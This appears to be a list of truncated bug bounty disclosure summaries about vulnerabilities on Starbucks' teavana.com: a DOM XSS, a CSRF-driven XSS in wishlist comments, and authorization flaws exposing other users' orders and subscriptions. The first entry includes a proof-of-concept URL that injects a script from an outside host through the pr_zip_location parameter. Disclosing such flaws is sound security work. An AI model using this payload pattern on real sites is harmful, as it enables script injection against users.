Starbucks: DOM XSS on teavana.com via "pr_zip_location" parameter
Hello Starbucks team, I've discovered a DOM XSS on teavana.com involving the pr_zip_location URL parameter. PoC: http://www.teavana.com/us/en/tea/green-tea/winterberry-tea-blend-32601.html?pr_zip_location=//whitehat-hacker.com/xss.j? Works in all major browsers. The vulnerable code is in full.js: var DR =...
Starbucks: Reflected XSS by exploiting CSRF vulnerability on teavana.com wishlist comment module. (wishlist-comments)
Users can add comments to their wishlist items. The HTTP request which adds a comment to a wishlist item looks like: POST /on/demandware.store/Sites-Teavana-Site/default/Wishlist-Comments/:id HTTP/1.1 Host: www.teavana.com User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10.12; rv:49.0...
Starbucks: Parameter Manipulation allowed for editing the shipping address for other user’s teavana.com subscriptions.
@meals discovered a vulnerability which allowed the shipping address for teavana.com order subscriptions to be edited without proper authorization. Thanks @meals!...
Starbucks: Parameter Manipulation allowed for viewing of other user’s teavana.com orders
A vulnerability existed which allowed unauthorized viewing of order details belonging to other users. @meals delivered a solid report and worked with us to resolve the issue. Thanks @meals! Proper authorization checks were not done on a specific parameter, which allowed any user on teavana.co...